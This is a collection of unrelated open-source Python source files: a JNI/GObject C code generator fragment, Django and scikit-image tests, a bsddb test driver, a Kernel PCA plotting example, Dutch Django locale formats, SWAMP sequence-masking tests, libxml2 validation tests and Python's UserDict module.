C.Assign('ref', 'instance_pointer', cast='GWeakRef*'),
C.Assign('gobj', C.Call('g_weak_ref_get', 'ref')),
C.Call('g_weak_ref_clear', 'ref'),
C.Call('g_free', 'ref'),
'',
C.If('!gobj',
C.Env.throw('IllegalStateException', '"GObject ref was NULL at finalization"'),
C.Return()),
C.Log('debug', 'unrefing GObject[%p]', 'gobj'),
C.Assign('wrapper', C.Call('g_object_get_data', 'gobj', '"java_instance"'), cast='JObjectWrapper*'),
C.If('wrapper', [
C.Call('g_object_set_data', 'gobj', '"java_instance"', 'NULL'),
C.Helper('jobject_wrapper_destroy', 'wrapper', 'TRUE'),
]),
C.Call('g_object_unref', 'gobj'),
]),
]
helper_functions = Helper.enumerate_used_helpers()
gobject_class_cache = [
C.Call('g_hash_table_insert', 'gobject_to_java_class_map', C.Call(clazz.glib_get_type), Cache.default_class(clazz.value))
for clazz in namespace.classes for namespace in namespaces];
# cached classes need to be enumerated last
cache_declarations, jni_onload_cache = C.Cache.enumerate_cached_classes()
jni_onload = Function(
name='JNI_OnLoad',
return_type='jint',
params=['JavaVM* vm', 'void* reserved'],
modifiers=[],
body=[
C.Decl('JNIEnv*', 'env'),
'',
C.Assign('jvm', 'vm'),
C.Assign('env', C.Call('get_jni_env')),
'',
jni_onload_cache,
'',
C.Assign('gobject_to_java_class_map', C.Call('g_hash_table_new', 'g_direct_hash', 'g_direct_equal')),
'',
gobject_class_cache,
'',
C.Return('JNI_VERSION_1_6'),
]
)
include_headers = ['jni.h', 'android/log.h'] + include_headers
includes = '\n'.join('#include <' + h + '>' for h in include_headers)
body = [
includes,
HEADER,
cache_declarations,
C.Decl('static GHashTable*', 'gobject_to_java_class_map'),
GET_JNI_ENV,
jni_onload,
jobject_wrapper_struct,
jobject_callback_wrapper_struct,
] + helper_functions + [native_destructor] + body
body = intersperse(prune_empty(body), '')
return flatjoin(body, '\n')
HEADER = """
#define android_assert(st) if (!(st)) {{ __android_log_write(ANDROID_LOG_ERROR, "OpenWebRTC", "Assertion failed at "G_STRINGIFY(__LINE__));}}
#undef g_assert
#define g_assert android_assert
#define log_verbose(st, ...) __android_log_print(ANDROID_LOG_VERBOSE, "{0}", "["G_STRINGIFY(__LINE__)"]: "st, ##__VA_ARGS__);
#define log_debug(st, ...) __android_log_print(ANDROID_LOG_DEBUG, "{0}", "["G_STRINGIFY(__LINE__)"]: "st, ##__VA_ARGS__);
#define log_info(st, ...) __android_log_print(ANDROID_LOG_INFO, "{0}", "["G_STRINGIFY(__LINE__)"]: "st, ##__VA_ARGS__);
#define log_warning(st, ...) __android_log_print(ANDROID_LOG_WARN, "{0}", "["G_STRINGIFY(__LINE__)"]: "st, ##__VA_ARGS__);
#define log_error(st, ...) __android_log_print(ANDROID_LOG_ERROR, "{0}", "["G_STRINGIFY(__LINE__)"]: "st, ##__VA_ARGS__);
""".format(config.LOG_TAG)
GET_JNI_ENV = [
C.Decl('static JavaVM*', 'jvm'),
C.Decl('static pthread_key_t', 'pthread_detach_key = 0'),
'',
C.Function('detach_current_thread',
params=['void* pthread_key'],
body=[
C.Decl('(void)', 'pthread_key'),
C.Call('g_return_if_fail', 'jvm'),
'',
C.Log.debug('JNI: detaching current thread from Java VM: %ld', C.Call('pthread_self')),
'',
C.Call('(*jvm)->DetachCurrentThread', 'jvm'),
C.Call('pthread_setspecific', 'pthread_detach_key', 'NULL'),
]
),
'',
C.Function('get_jni_env',
return_type='JNIEnv*',
params=[],
body=[
C.Decl('JNIEnv*', 'env'),
C.Decl('int', 'ret'),
'',
C.Assign('env', 'NULL'),
C.Assign('ret', C.Call('(*jvm)->GetEnv', 'jvm', '(void**)&env', 'JNI_VERSION_1_6')),
'',
C.IfElse(ifs=['ret == JNI_EDETACHED', 'ret == JNI_EVERSION'],
bodies=[
C.IfElse(ifs=['(*jvm)->AttachCurrentThread(jvm, (JNIEnv**) &env, NULL) != 0'],
bodies=[
C.Log.error('JNI: failed to attach thread'), [
C.Log.info('JNI: successfully attached to thread'),
C.If(C.Call('pthread_key_create', '&pthread_detach_key', 'detach_current_thread'),
C.Log.error('JNI: failed to set detach callback')),
C.Call('pthread_setspecific', 'pthread_detach_key', 'jvm'),
]
]),
C.Log.error('JNI: version not supported'),
]
),
'',
C.Assert('env'),
C.Return('env'),
]
),
]
|
kirstykitto/CLAtoolkit
|
refs/heads/master
|
clatoolkit_project/clatoolkit/tests.py
|
24123
|
from django.test import TestCase
# Create your tests here.
|
chriscrosscutler/scikit-image
|
refs/heads/master
|
skimage/feature/tests/__init__.py
|
672
|
from ..._shared.testing import setup_test, teardown_test
def setup():
setup_test()
def teardown():
teardown_test()
|
blackzw/openwrt_sdk_dev1
|
refs/heads/master
|
staging_dir/target-mips_r2_uClibc-0.9.33.2/usr/lib/python2.7/test/test_bsddb3.py
|
135
|
# Test driver for bsddb package.
"""
Run all test cases.
"""
import os
import sys
import tempfile
import time
import unittest
from test.test_support import requires, run_unittest, import_module
# Skip test if _bsddb module was not built.
import_module('_bsddb')
# Silence Py3k warning
import_module('bsddb', deprecated=True)
# When running as a script instead of within the regrtest framework, skip the
# requires test, since it's obvious we want to run them.
if __name__ != '__main__':
requires('bsddb')
verbose = False
if 'verbose' in sys.argv:
verbose = True
sys.argv.remove('verbose')
if 'silent' in sys.argv: # take care of old flag, just in case
verbose = False
sys.argv.remove('silent')
class TimingCheck(unittest.TestCase):
"""This class is not a real test. Its purpose is to print a message
periodically when the test runs slowly. This will prevent the buildbots
from timing out on slow machines."""
# How much time in seconds before printing a 'Still working' message.
# Since this is run at most once between each test module, use a smaller
# interval than other tests.
_PRINT_WORKING_MSG_INTERVAL = 4 * 60
# next_time is used as a global variable that survives each instance.
# This is necessary since a new instance will be created for each test.
next_time = time.time() + _PRINT_WORKING_MSG_INTERVAL
def testCheckElapsedTime(self):
# Print still working message since these tests can be really slow.
now = time.time()
if self.next_time <= now:
TimingCheck.next_time = now + self._PRINT_WORKING_MSG_INTERVAL
sys.__stdout__.write(' test_bsddb3 still working, be patient...\n')
sys.__stdout__.flush()
# For invocation through regrtest
def test_main():
from bsddb import db
from bsddb.test import test_all
test_all.set_test_path_prefix(os.path.join(tempfile.gettempdir(),
'z-test_bsddb3-%s' %
os.getpid()))
# Please leave this print in, having this show up in the buildbots
# makes diagnosing problems a lot easier.
print >>sys.stderr, db.DB_VERSION_STRING
print >>sys.stderr, 'Test path prefix: ', test_all.get_test_path_prefix()
try:
run_unittest(test_all.suite(module_prefix='bsddb.test.',
timing_check=TimingCheck))
finally:
# The only reason to remove db_home is in case if there is an old
# one lying around. This might be by a different user, so just
# ignore errors. We should always make a unique name now.
try:
test_all.remove_test_path_directory()
except:
pass
if __name__ == '__main__':
test_main()
|
kagayakidan/scikit-learn
|
refs/heads/master
|
examples/decomposition/plot_kernel_pca.py
|
353
|
"""
==========
Kernel PCA
==========
This example shows that Kernel PCA is able to find a projection of the data
that makes data linearly separable.
"""
print(__doc__)
# Authors: Mathieu Blondel
# Andreas Mueller
# License: BSD 3 clause
import numpy as np
import matplotlib.pyplot as plt
from sklearn.decomposition import PCA, KernelPCA
from sklearn.datasets import make_circles
np.random.seed(0)
X, y = make_circles(n_samples=400, factor=.3, noise=.05)
kpca = KernelPCA(kernel="rbf", fit_inverse_transform=True, gamma=10)
X_kpca = kpca.fit_transform(X)
X_back = kpca.inverse_transform(X_kpca)
pca = PCA()
X_pca = pca.fit_transform(X)
# Plot results
plt.figure()
plt.subplot(2, 2, 1, aspect='equal')
plt.title("Original space")
reds = y == 0
blues = y == 1
plt.plot(X[reds, 0], X[reds, 1], "ro")
plt.plot(X[blues, 0], X[blues, 1], "bo")
plt.xlabel("$x_1$")
plt.ylabel("$x_2$")
X1, X2 = np.meshgrid(np.linspace(-1.5, 1.5, 50), np.linspace(-1.5, 1.5, 50))
X_grid = np.array([np.ravel(X1), np.ravel(X2)]).T
# projection on the first principal component (in the phi space)
Z_grid = kpca.transform(X_grid)[:, 0].reshape(X1.shape)
plt.contour(X1, X2, Z_grid, colors='grey', linewidths=1, origin='lower')
plt.subplot(2, 2, 2, aspect='equal')
plt.plot(X_pca[reds, 0], X_pca[reds, 1], "ro")
plt.plot(X_pca[blues, 0], X_pca[blues, 1], "bo")
plt.title("Projection by PCA")
plt.xlabel("1st principal component")
plt.ylabel("2nd component")
plt.subplot(2, 2, 3, aspect='equal')
plt.plot(X_kpca[reds, 0], X_kpca[reds, 1], "ro")
plt.plot(X_kpca[blues, 0], X_kpca[blues, 1], "bo")
plt.title("Projection by KPCA")
plt.xlabel("1st principal component in space induced by $\phi$")
plt.ylabel("2nd component")
plt.subplot(2, 2, 4, aspect='equal')
plt.plot(X_back[reds, 0], X_back[reds, 1], "ro")
plt.plot(X_back[blues, 0], X_back[blues, 1], "bo")
plt.title("Original space after inverse transform")
plt.xlabel("$x_1$")
plt.ylabel("$x_2$")
plt.subplots_adjust(0.02, 0.10, 0.98, 0.94, 0.04, 0.35)
plt.show()
|
olasitarska/django
|
refs/heads/master
|
tests/model_regress/tests.py
|
39
|
from __future__ import unicode_literals
import datetime
from operator import attrgetter
import sys
import unittest
from django.core.exceptions import ValidationError
from django.test import TestCase, skipUnlessDBFeature
from django.utils import six
from django.utils.timezone import get_fixed_timezone
from django.db import connection, router
from django.db.models.sql import InsertQuery
from .models import (Worker, Article, Party, Event, Department,
BrokenUnicodeMethod, NonAutoPK, Model1, Model2, Model3)
class ModelTests(TestCase):
# The bug is that the following queries would raise:
# "TypeError: Related Field has invalid lookup: gte"
def test_related_gte_lookup(self):
"""
Regression test for #10153: foreign key __gte lookups.
"""
Worker.objects.filter(department__gte=0)
def test_related_lte_lookup(self):
"""
Regression test for #10153: foreign key __lte lookups.
"""
Worker.objects.filter(department__lte=0)
def test_sql_insert_compiler_return_id_attribute(self):
"""
Regression test for #14019: SQLInsertCompiler.as_sql() failure
"""
db = router.db_for_write(Party)
query = InsertQuery(Party)
query.insert_values([Party._meta.fields[0]], [], raw=False)
# this line will raise an AttributeError without the accompanying fix
query.get_compiler(using=db).as_sql()
def test_empty_choice(self):
# NOTE: Part of the regression test here is merely parsing the model
# declaration. The verbose_name, in particular, did not always work.
a = Article.objects.create(
headline="Look at me!", pub_date=datetime.datetime.now()
)
# An empty choice field should return None for the display name.
self.assertIs(a.get_status_display(), None)
# Empty strings should be returned as Unicode
a = Article.objects.get(pk=a.pk)
self.assertEqual(a.misc_data, '')
self.assertIs(type(a.misc_data), six.text_type)
def test_long_textfield(self):
# TextFields can hold more than 4000 characters (this was broken in
# Oracle).
a = Article.objects.create(
headline="Really, really big",
pub_date=datetime.datetime.now(),
article_text="ABCDE" * 1000
)
a = Article.objects.get(pk=a.pk)
self.assertEqual(len(a.article_text), 5000)
def test_long_unicode_textfield(self):
# TextFields can hold more than 4000 bytes also when they are
# less than 4000 characters
a = Article.objects.create(
headline="Really, really big",
pub_date=datetime.datetime.now(),
article_text='\u05d0\u05d1\u05d2' * 1000
)
a = Article.objects.get(pk=a.pk)
self.assertEqual(len(a.article_text), 3000)
def test_date_lookup(self):
# Regression test for #659
Party.objects.create(when=datetime.datetime(1999, 12, 31))
Party.objects.create(when=datetime.datetime(1998, 12, 31))
Party.objects.create(when=datetime.datetime(1999, 1, 1))
Party.objects.create(when=datetime.datetime(1, 3, 3))
self.assertQuerysetEqual(
Party.objects.filter(when__month=2), []
)
self.assertQuerysetEqual(
Party.objects.filter(when__month=1), [
datetime.date(1999, 1, 1)
],
attrgetter("when")
)
self.assertQuerysetEqual(
Party.objects.filter(when__month=12), [
datetime.date(1999, 12, 31),
datetime.date(1998, 12, 31),
],
attrgetter("when"),
ordered=False
)
self.assertQuerysetEqual(
Party.objects.filter(when__year=1998), [
datetime.date(1998, 12, 31),
],
attrgetter("when")
)
# Regression test for #8510
self.assertQuerysetEqual(
Party.objects.filter(when__day="31"), [
datetime.date(1999, 12, 31),
datetime.date(1998, 12, 31),
],
attrgetter("when"),
ordered=False
)
self.assertQuerysetEqual(
Party.objects.filter(when__month="12"), [
datetime.date(1999, 12, 31),
datetime.date(1998, 12, 31),
],
attrgetter("when"),
ordered=False
)
self.assertQuerysetEqual(
Party.objects.filter(when__year="1998"), [
datetime.date(1998, 12, 31),
],
attrgetter("when")
)
# Regression test for #18969
self.assertQuerysetEqual(
Party.objects.filter(when__year=1), [
datetime.date(1, 3, 3),
],
attrgetter("when")
)
self.assertQuerysetEqual(
Party.objects.filter(when__year='1'), [
datetime.date(1, 3, 3),
],
attrgetter("when")
)
if (3,) <= sys.version_info < (3, 3) and connection.vendor == 'mysql':
# In Python < 3.3, datetime.strftime raises an exception for years
# below 1000, and existing MySQL DB-API drivers hit this problem.
test_date_lookup = unittest.expectedFailure(test_date_lookup)
def test_date_filter_null(self):
# Date filtering was failing with NULL date values in SQLite
# (regression test for #3501, among other things).
Party.objects.create(when=datetime.datetime(1999, 1, 1))
Party.objects.create()
p = Party.objects.filter(when__month=1)[0]
self.assertEqual(p.when, datetime.date(1999, 1, 1))
self.assertQuerysetEqual(
Party.objects.filter(pk=p.pk).dates("when", "month"), [
1
],
attrgetter("month")
)
def test_get_next_prev_by_field(self):
# Check that get_next_by_FIELD and get_previous_by_FIELD don't crash
# when we have usecs values stored on the database
#
# It crashed after the Field.get_db_prep_* refactor, because on most
# backends DateTimeFields supports usecs, but DateTimeField.to_python
# didn't recognize them. (Note that
# Model._get_next_or_previous_by_FIELD coerces values to strings)
Event.objects.create(when=datetime.datetime(2000, 1, 1, 16, 0, 0))
Event.objects.create(when=datetime.datetime(2000, 1, 1, 6, 1, 1))
Event.objects.create(when=datetime.datetime(2000, 1, 1, 13, 1, 1))
e = Event.objects.create(when=datetime.datetime(2000, 1, 1, 12, 0, 20, 24))
self.assertEqual(
e.get_next_by_when().when, datetime.datetime(2000, 1, 1, 13, 1, 1)
)
self.assertEqual(
e.get_previous_by_when().when, datetime.datetime(2000, 1, 1, 6, 1, 1)
)
def test_primary_key_foreign_key_types(self):
# Check Department and Worker (non-default PK type)
d = Department.objects.create(id=10, name="IT")
w = Worker.objects.create(department=d, name="Full-time")
self.assertEqual(six.text_type(w), "Full-time")
def test_broken_unicode(self):
# Models with broken unicode methods should still have a printable repr
b = BrokenUnicodeMethod.objects.create(name="Jerry")
self.assertEqual(repr(b), "<BrokenUnicodeMethod: [Bad Unicode data]>")
@skipUnlessDBFeature("supports_timezones")
def test_timezones(self):
# Saving an updating with timezone-aware datetime Python objects.
# Regression test for #10443.
# The idea is that all these creations and saving should work without
# crashing. It's not rocket science.
dt1 = datetime.datetime(2008, 8, 31, 16, 20, tzinfo=get_fixed_timezone(600))
dt2 = datetime.datetime(2008, 8, 31, 17, 20, tzinfo=get_fixed_timezone(600))
obj = Article.objects.create(
headline="A headline", pub_date=dt1, article_text="foo"
)
obj.pub_date = dt2
obj.save()
self.assertEqual(
Article.objects.filter(headline="A headline").update(pub_date=dt1),
1
)
def test_chained_fks(self):
"""
Regression for #18432: Chained foreign keys with to_field produce incorrect query
"""
m1 = Model1.objects.create(pkey=1000)
m2 = Model2.objects.create(model1=m1)
m3 = Model3.objects.create(model2=m2)
# this is the actual test for #18432
m3 = Model3.objects.get(model2=1000)
m3.model2
class ModelValidationTest(TestCase):
def test_pk_validation(self):
NonAutoPK.objects.create(name="one")
again = NonAutoPK(name="one")
self.assertRaises(ValidationError, again.validate_unique)
class EvaluateMethodTest(TestCase):
"""
Regression test for #13640: cannot filter by objects with 'evaluate' attr
"""
def test_model_with_evaluate_method(self):
"""
Ensures that you can filter by objects that have an 'evaluate' attr
"""
dept = Department.objects.create(pk=1, name='abc')
dept.evaluate = 'abc'
Worker.objects.filter(department=dept)
|
raajitr/django_hangman
|
refs/heads/master
|
env/lib/python2.7/site-packages/django/conf/locale/nl/formats.py
|
504
|
# -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j F Y' # '20 januari 2009'
TIME_FORMAT = 'H:i' # '15:23'
DATETIME_FORMAT = 'j F Y H:i' # '20 januari 2009 15:23'
YEAR_MONTH_FORMAT = 'F Y' # 'januari 2009'
MONTH_DAY_FORMAT = 'j F' # '20 januari'
SHORT_DATE_FORMAT = 'j-n-Y' # '20-1-2009'
SHORT_DATETIME_FORMAT = 'j-n-Y H:i' # '20-1-2009 15:23'
FIRST_DAY_OF_WEEK = 1 # Monday (in Dutch 'maandag')
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = [
'%d-%m-%Y', '%d-%m-%y', # '20-01-2009', '20-01-09'
'%d/%m/%Y', '%d/%m/%y', # '20/01/2009', '20/01/09'
# '%d %b %Y', '%d %b %y', # '20 jan 2009', '20 jan 09'
# '%d %B %Y', '%d %B %y', # '20 januari 2009', '20 januari 09'
]
# Kept ISO formats as one is in first position
TIME_INPUT_FORMATS = [
'%H:%M:%S', # '15:23:35'
'%H:%M:%S.%f', # '15:23:35.000200'
'%H.%M:%S', # '15.23:35'
'%H.%M:%S.%f', # '15.23:35.000200'
'%H.%M', # '15.23'
'%H:%M', # '15:23'
]
DATETIME_INPUT_FORMATS = [
# With time in %H:%M:%S :
'%d-%m-%Y %H:%M:%S', '%d-%m-%y %H:%M:%S', '%Y-%m-%d %H:%M:%S',
# '20-01-2009 15:23:35', '20-01-09 15:23:35', '2009-01-20 15:23:35'
'%d/%m/%Y %H:%M:%S', '%d/%m/%y %H:%M:%S', '%Y/%m/%d %H:%M:%S',
# '20/01/2009 15:23:35', '20/01/09 15:23:35', '2009/01/20 15:23:35'
# '%d %b %Y %H:%M:%S', '%d %b %y %H:%M:%S', # '20 jan 2009 15:23:35', '20 jan 09 15:23:35'
# '%d %B %Y %H:%M:%S', '%d %B %y %H:%M:%S', # '20 januari 2009 15:23:35', '20 januari 2009 15:23:35'
# With time in %H:%M:%S.%f :
'%d-%m-%Y %H:%M:%S.%f', '%d-%m-%y %H:%M:%S.%f', '%Y-%m-%d %H:%M:%S.%f',
# '20-01-2009 15:23:35.000200', '20-01-09 15:23:35.000200', '2009-01-20 15:23:35.000200'
'%d/%m/%Y %H:%M:%S.%f', '%d/%m/%y %H:%M:%S.%f', '%Y/%m/%d %H:%M:%S.%f',
# '20/01/2009 15:23:35.000200', '20/01/09 15:23:35.000200', '2009/01/20 15:23:35.000200'
# With time in %H.%M:%S :
'%d-%m-%Y %H.%M:%S', '%d-%m-%y %H.%M:%S', # '20-01-2009 15.23:35', '20-01-09 15.23:35'
'%d/%m/%Y %H.%M:%S', '%d/%m/%y %H.%M:%S', # '20/01/2009 15.23:35', '20/01/09 15.23:35'
# '%d %b %Y %H.%M:%S', '%d %b %y %H.%M:%S', # '20 jan 2009 15.23:35', '20 jan 09 15.23:35'
# '%d %B %Y %H.%M:%S', '%d %B %y %H.%M:%S', # '20 januari 2009 15.23:35', '20 januari 2009 15.23:35'
# With time in %H.%M:%S.%f :
'%d-%m-%Y %H.%M:%S.%f', '%d-%m-%y %H.%M:%S.%f', # '20-01-2009 15.23:35.000200', '20-01-09 15.23:35.000200'
'%d/%m/%Y %H.%M:%S.%f', '%d/%m/%y %H.%M:%S.%f', # '20/01/2009 15.23:35.000200', '20/01/09 15.23:35.000200'
# With time in %H:%M :
'%d-%m-%Y %H:%M', '%d-%m-%y %H:%M', '%Y-%m-%d %H:%M', # '20-01-2009 15:23', '20-01-09 15:23', '2009-01-20 15:23'
'%d/%m/%Y %H:%M', '%d/%m/%y %H:%M', '%Y/%m/%d %H:%M', # '20/01/2009 15:23', '20/01/09 15:23', '2009/01/20 15:23'
# '%d %b %Y %H:%M', '%d %b %y %H:%M', # '20 jan 2009 15:23', '20 jan 09 15:23'
# '%d %B %Y %H:%M', '%d %B %y %H:%M', # '20 januari 2009 15:23', '20 januari 2009 15:23'
# With time in %H.%M :
'%d-%m-%Y %H.%M', '%d-%m-%y %H.%M', # '20-01-2009 15.23', '20-01-09 15.23'
'%d/%m/%Y %H.%M', '%d/%m/%y %H.%M', # '20/01/2009 15.23', '20/01/09 15.23'
# '%d %b %Y %H.%M', '%d %b %y %H.%M', # '20 jan 2009 15.23', '20 jan 09 15.23'
# '%d %B %Y %H.%M', '%d %B %y %H.%M', # '20 januari 2009 15.23', '20 januari 2009 15.23'
# Without time :
'%d-%m-%Y', '%d-%m-%y', '%Y-%m-%d', # '20-01-2009', '20-01-09', '2009-01-20'
'%d/%m/%Y', '%d/%m/%y', '%Y/%m/%d', # '20/01/2009', '20/01/09', '2009/01/20'
# '%d %b %Y', '%d %b %y', # '20 jan 2009', '20 jan 09'
# '%d %B %Y', '%d %B %y', # '20 januari 2009', '20 januari 2009'
]
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = '.'
NUMBER_GROUPING = 3
|
peterwharrison/SWAMP
|
refs/heads/master
|
tests.py
|
1
|
import unittest
import SWAMP
class TestSequenceMasking(unittest.TestCase):
def test_read_branchcodes(self):
infile = 'example_dataset/branchcodes.txt'
branch_codes = SWAMP.read_branchcodes(infile)
# Branch codes come out like '5..7' -> (papio, colobus)
branch_a = branch_codes['5..7']
self.assertIn('papio', branch_a)
self.assertIn('colobus', branch_a)
# Single-species branch should have single-length array, e.g.
# '6..2' -> (human)
branch_b = branch_codes['6..2']
self.assertEqual(len(branch_b), 1)
def test_branch_error_check(self):
seq_file = 'example_dataset/data/44/44.phy'
seq_dict = SWAMP.read_phylip(seq_file)
branch_file = 'example_dataset/branchcodes.txt'
branch_codes = SWAMP.read_branchcodes(branch_file)
# No error raised when valid branch codes provided.
SWAMP.branch_error_check(branch_codes, seq_dict)
# Error is raised when branchcodes is not present
# (e.g. no file provided by user on command line)
with self.assertRaises(ValueError) as cm:
SWAMP.branch_error_check(None, seq_dict)
# Mess up one of the branch_codes, adding an unknown species
branch_codes['5..7'] += tuple(['gorilla'])
# Error is raised when species isn't found in seq_dict.
with self.assertRaises(ValueError) as cm:
SWAMP.branch_error_check(branch_codes, seq_dict)
def test_read_phylip(self):
infile = 'example_dataset/data/101/101.phy'
seq_dict = SWAMP.read_phylip(infile)
# read_phylip returns a dict
self.assertTrue(type(seq_dict) is dict)
# Dict contains 4 seqs
self.assertEqual(len(seq_dict.keys()), 4)
# Sequence length check.
self.assertEqual(len(seq_dict['pongo']), 1413)
# Try another file.
infile = 'example_dataset/data/44/44.phy'
seq_dict = SWAMP.read_phylip(infile)
self.assertEqual(len(seq_dict['pongo']), 1905)
def test_write_phylip(self):
infile = 'example_dataset/data/44/44.phy'
seq_dict = SWAMP.read_phylip(infile)
# Create some fake codons to mask.
codons_to_mask = {}
for i in range(2, 13):
codons_to_mask[i] = ['pongo', 'homo']
# Write file...
masked_dict = SWAMP.mask_codons(seq_dict, codons_to_mask)
SWAMP.print_masked_phyfile(infile, masked_dict)
# Read it back
masked_file = 'example_dataset/data/44/44_masked.phy'
new_masked_dict = SWAMP.read_phylip(masked_file)
pongo_seq = new_masked_dict['pongo']
human_seq = new_masked_dict['homo']
colobus_seq = new_masked_dict['colobus']
# Make sure we see the masked seqs
self.assertTrue(('NNN' * 10) in pongo_seq)
self.assertTrue(('NNN' * 10) in human_seq)
self.assertFalse(('NNN' * 10) in colobus_seq)
def test_sliding_window_scan(self):
infiles = ['example_dataset/data/44/44.phy']
threshold = 1
windowsize = 20
interscan = False
branch_file = 'example_dataset/branchcodes.txt'
branch_codes = SWAMP.read_branchcodes(branch_file)
# Run a sliding window scan on this single file.
SWAMP.sliding_window_scan(infiles, threshold, windowsize,
interscan, branch_codes)
# Check that the masked file exists and contains 'NNN's
masked_file = 'example_dataset/data/44/44_masked.phy'
masked_dict = SWAMP.read_phylip(masked_file)
pongo_seq = masked_dict['pongo']
self.assertTrue('NNN' in pongo_seq)
# Increase threshold, ensure NNNs are gone.
threshold = 10
SWAMP.sliding_window_scan(infiles, threshold, windowsize,
interscan, branch_codes)
masked_dict = SWAMP.read_phylip(masked_file)
pongo_seq = masked_dict['pongo']
self.assertFalse('NNN' in pongo_seq)
def test_read_rst(self):
# Extract branch information from rst file
infile = 'example_dataset/data/44/44.phy'
branches = SWAMP.read_rst(infile)
self.assertEqual(len(branches['5..7']), 6)
self.assertEqual(len(branches['5..6']), 0)
def test_interscan(self):
infile = 'example_dataset/data/44/44.phy'
threshold = 1
windowsize = 10
interscan = False
branch_file = 'example_dataset/branchcodes.txt'
branch_codes = SWAMP.read_branchcodes(branch_file)
# Mask without interscan... fewer masked codons
result = SWAMP.sliding_window_scan_file(infile, threshold, windowsize,
interscan, branch_codes)
self.assertEqual(result['masked_column_count'], 215)
# Mask with interscan... more masked codons
interscan = True
result = SWAMP.sliding_window_scan_file(infile, threshold, windowsize,
interscan, branch_codes)
self.assertEqual(result['masked_column_count'], 301)
if __name__ == '__main__':
unittest.main()
|
surfnzdotcom/cvsnt-fork
|
refs/heads/master
|
libxml/python/tests/validate.py
|
87
|
#!/usr/bin/python -u
import sys
import libxml2
# Memory debug specific
libxml2.debugMemory(1)
ctxt = libxml2.createFileParserCtxt("valid.xml")
ctxt.validate(1)
ctxt.parseDocument()
doc = ctxt.doc()
valid = ctxt.isValid()
if doc.name != "valid.xml":
print "doc.name failed"
sys.exit(1)
root = doc.children
if root.name != "doc":
print "root.name failed"
sys.exit(1)
if valid != 1:
print "validity chec failed"
sys.exit(1)
doc.freeDoc()
i = 1000
while i > 0:
ctxt = libxml2.createFileParserCtxt("valid.xml")
ctxt.validate(1)
ctxt.parseDocument()
doc = ctxt.doc()
valid = ctxt.isValid()
doc.freeDoc()
if valid != 1:
print "validity check failed"
sys.exit(1)
i = i - 1
#desactivate error messages from the validation
def noerr(ctx, str):
pass
libxml2.registerErrorHandler(noerr, None)
ctxt = libxml2.createFileParserCtxt("invalid.xml")
ctxt.validate(1)
ctxt.parseDocument()
doc = ctxt.doc()
valid = ctxt.isValid()
if doc.name != "invalid.xml":
print "doc.name failed"
sys.exit(1)
root = doc.children
if root.name != "doc":
print "root.name failed"
sys.exit(1)
if valid != 0:
print "validity chec failed"
sys.exit(1)
doc.freeDoc()
i = 1000
while i > 0:
ctxt = libxml2.createFileParserCtxt("invalid.xml")
ctxt.validate(1)
ctxt.parseDocument()
doc = ctxt.doc()
valid = ctxt.isValid()
doc.freeDoc()
if valid != 0:
print "validity check failed"
sys.exit(1)
i = i - 1
del ctxt
# Memory debug specific
libxml2.cleanupParser()
if libxml2.debugMemory(1) == 0:
print "OK"
else:
print "Memory leak %d bytes" % (libxml2.debugMemory(1))
libxml2.dumpMemory()
|
koson/MissionPlannerKMTI
|
refs/heads/master
|
Lib/UserDict.py
|
358
|
"""A more or less complete user-defined wrapper around dictionary objects."""
class UserDict:
def __init__(self, dict=None, **kwargs):
self.data = {}
if dict is not None:
self.update(dict)
if len(kwargs):
self.update(kwargs)
def __repr__(self): return repr(self.data)
def __cmp__(self, dict):
if isinstance(dict, UserDict):
return cmp(self.data, dict.data)
else:
return cmp(self.data, dict)
__hash__ = None # Avoid Py3k warning
def __len__(self): return len(self.data)
def __getitem__(self, key):
if key in self.data:
return self.data[key]
if hasattr(self.__class__, "__missing__"):
return self.__class__.__missing__(self, key)
raise KeyError(key)
def __setitem__(self, key, item): self.data[key] = item
def __delitem__(self, key): del self.data[key]
def clear(self): self.data.clear()
def copy(self):
if self.__class__ is UserDict:
return UserDict(self.data.copy())
import copy
data = self.data
try:
self.data = {}
c = copy.copy(self)
finally:
self.data = data
c.update(self)
return c
def keys(self): return self.data.keys()
def items(self): return self.data.items()
def iteritems(self): return self.data.iteritems()
def iterkeys(self): return self.data.iterkeys()
def itervalues(self): return self.data.itervalues()
def values(self): return self.data.values()
def has_key(self, key): return key in self.data
def update(self, dict=None, **kwargs):
if dict is None:
pass
elif isinstance(dict, UserDict):
self.data.update(dict.data)
elif isinstance(dict, type({})) or not hasattr(dict, 'items'):
self.data.update(dict)
else:
for k, v in dict.items():
self[k] = v
if len(kwargs):
self.data.update(kwargs)
def get(self, key, failobj=None):
if key not in self:
return failobj
return self[key]
def setdefault(self, key, failobj=None):
if key not in self:
self[key] = failobj
return self[key]
def pop(self, key, *args):
return self.data.pop(key, *args)
def popitem(self):
return self.data.popitem()
def __contains__(self, key):
return key in self.data
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
class IterableUserDict(UserDict):
def __iter__(self):
return iter(self.data)
import _abcoll
_abcoll.MutableMapping.register(IterableUserDict)
class DictMixin:
# Mixin defining all dictionary methods for classes that already have
# a minimum dictionary interface including getitem, setitem, delitem,
# and keys. Without knowledge of the subclass constructor, the mixin
# does not define __init__() or copy(). In addition to the four base
# methods, progressively more efficiency comes with defining
# __contains__(), __iter__(), and iteritems().
# second level definitions support higher levels
def __iter__(self):
for k in self.keys():
yield k
def has_key(self, key):
try:
self[key]
except KeyError:
return False
return True
def __contains__(self, key):
return self.has_key(key)
# third level takes advantage of second level definitions
def iteritems(self):
for k in self:
yield (k, self[k])
def iterkeys(self):
return self.__iter__()
# fourth level uses definitions from lower levels
def itervalues(self):
for _, v in self.iteritems():
yield v
def values(self):
return [v for _, v in self.iteritems()]
def items(self):
return list(self.iteritems())
def clear(self):
for key in self.keys():
del self[key]
def setdefault(self, key, default=None):
try:
return self[key]
except KeyError:
self[key] = default
return default
def pop(self, key, *args):
if len(args) > 1:
raise TypeError, "pop expected at most 2 arguments, got "\
+ repr(1 + len(args))
try:
value = self[key]
except KeyError:
if args:
return args[0]
raise
del self[key]
return value
def popitem(self):
try:
k, v = self.iteritems().next()
except StopIteration:
raise KeyError, 'container is empty'
del self[k]
return (k, v)
